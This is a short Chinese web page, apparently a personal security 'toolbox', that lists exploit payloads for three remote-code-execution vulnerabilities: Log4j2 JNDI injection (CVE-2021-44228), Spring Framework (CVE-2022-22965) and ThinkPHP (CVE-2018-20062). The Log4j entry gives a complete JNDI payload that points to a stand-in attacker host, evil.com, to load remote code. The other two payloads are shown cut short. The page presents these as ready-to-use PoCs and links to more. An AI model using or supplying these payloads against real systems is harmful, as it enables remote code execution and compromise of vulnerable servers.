工具箱
fish の 妙妙工具箱
安全工具 →
点击查看更多漏洞POC →
点击查看更多Log4j2 JNDI注入
CVE-2021-44228Apache Log4j2 存在JNDI注入漏洞,可导致远程代码执行
Payload
${jndi:ldap://evil.com/a}Spring Core RCE
CVE-2022-22965Spring Framework 远程代码执行漏洞
Payload
class.module.getClassLoader().addUrl...
ThinkPHP RCE
CVE-2018-20062ThinkPHP 远程代码执行漏洞
Payload
?s=index/think\app/invokefunction&function=call_user_func_array...
